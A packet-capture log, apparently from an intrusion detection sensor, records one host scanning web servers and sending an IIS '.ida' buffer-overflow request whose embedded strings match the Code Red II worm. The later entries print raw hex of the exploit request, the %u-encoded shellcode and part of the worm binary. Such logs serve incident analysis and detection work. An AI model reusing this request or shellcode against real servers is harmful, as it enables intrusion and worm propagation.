No run mode specified, defaulting to verbose mode

09/17-22:25:01.673690 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22102 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8246FF54  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:25:04.723903 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22385 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8246FF54  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:25:09.315554 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:3701 -> 137.189.97.249:80 TCP TTL:122 TOS:0x0 ID:22882 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8246FF54  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:25:12.378993 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23226 IpLen:20 DgmLen:48 DF
******S* Seq: 0x838B9A1A  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:25:14.617212 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23475 IpLen:20 DgmLen:48 DF
******S* Seq: 0x838B9A1A  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:25:19.089876 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:4084 -> 137.189.98.84:80 TCP TTL:122 TOS:0x0 ID:23977 IpLen:20 DgmLen:48 DF
******S* Seq: 0x838B9A1A  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:03.977805 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28116 IpLen:20 DgmLen:48 DF
******S* Seq: 0x88FE7064  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:06.939005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:28391 IpLen:20 DgmLen:48 DF
******S* Seq: 0x894E9260  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:06.966861 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28395 IpLen:20 DgmLen:48 DF
******S* Seq: 0x88FE7064  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:09.402015 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:28665 IpLen:20 DgmLen:48 DF
******S* Seq: 0x894E9260  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:11.406266 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28891 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x88FE7065  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:11.770137 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28892 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x88FE7065  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[1500-byte TCP payload, hex dump omitted. Readable content: "GET /default.ida?" followed by 224 'X' bytes and a %u-encoded sequence ending in "%u00=a  HTTP/1.0", then "Content-type: text/xml", "Content-length: 3379", a blank line, and binary code whose embedded strings name LoadLibraryA, CreateThread, GetTickCount, Sleep, GetSystemDefaultLangID, GetSystemDirectoryA, CopyFileA, GlobalFindAtomA, GlobalAddAtomA.]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:12.091712 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:28893 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x88FE7619  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[1500-byte TCP payload (continuation), hex dump omitted. Embedded strings: CloseHandle, _lcreat, _lwrite, _lclose, GetSystemTime, WS2_32.DLL (socket, closesocket, ioctlsocket, connect, select, send, recv, gethostname, gethostbyname, WSAGetLastError), USER32.DLL (ExitWindowsEx), \CMD.EXE, d:\inetpub\scripts\root.exe, d:\progra~1\common~1\system\MSADC\root.exe, followed by the start of an embedded MZ/PE image.]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:15.371848 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29148 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x88FE7BCD  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:15.545035 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29150 IpLen:20 DgmLen:938 DF
***AP*** Seq: 0x88FE7BCD  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[938-byte TCP payload (final segment), hex dump omitted. Embedded strings: \EXPLORER.EXE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, SFCDisable, SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots, /Scripts, /MSADC, /C, /D, c:\,,217, d:\,,217, imports from KERNEL32.dll and ADVAPI32.dll (Sleep, GetWindowsDirectoryA, WinExec, RegQueryValueExA, RegSetValueExA, RegOpenKeyExA, RegCloseKey), d:\explorer.exe.]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:15.925794 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:1821 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:29191 IpLen:20 DgmLen:48 DF
******S* Seq: 0x894E9260  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:19.477004 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29444 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x88FE7065  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[1500-byte TCP payload, hex dump omitted: byte-for-byte retransmission of the segment sent at 22:26:11.770137 (Seq 0x88FE7065).]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:19.892035 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E
202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:29472 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8A8418BD  Ack: 0x0  Win: 0x2238  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:21.522217 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29622 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x88FE7619  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[1500-byte TCP payload, hex dump omitted: byte-for-byte retransmission of the segment sent at 22:26:12.091712 (Seq 0x88FE7619).]

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/17-22:26:21.688050 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8
202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29623 IpLen:20 DgmLen:938 DF
***AP*** Seq: 0x88FE7BCD  Ack: 0xFAF596F6  Win: 0x2238  TcpLen: 20
[938-byte TCP payload, hex dump omitted: retransmission of the segment sent at 22:26:15.545035 (Seq 0x88FE7BCD); the capture ends partway through this packet.]
52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:22.715361 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:29735 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8A8418BD Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:26.255122 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29918 IpLen:20 DgmLen:40 DF *****R** Seq: 0x88FE7F4F Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:26.255740 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:29919 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:28.049292 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30048 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.094016 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2176 -> 137.189.97.52:80 TCP TTL:122 TOS:0x0 ID:30257 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8A8418BD Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.546878 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:30271 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:30.655495 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30280 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:31.153570 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30336 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:32.876348 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30454 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:32.880157 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30456 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:33.038095 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:1727 -> 137.189.96.19:80 TCP TTL:122 TOS:0x0 ID:30472 IpLen:20 DgmLen:40 *****R** Seq: 0x88FE7F4F Ack: 0x88FE7F4F Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:33.619792 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:30543 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:36.892884 0:E0:4F:61:A8:80 -> 
0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30841 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:38.958128 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:31049 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:41.278428 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:31314 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:44.069401 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:31578 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:46.723320 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:31853 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.162692 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:32125 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.227576 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32134 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.264765 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32140 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:51.518544 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32392 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:53.759427 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32642 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:54.788136 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32729 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:55.082333 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32731 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 
61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 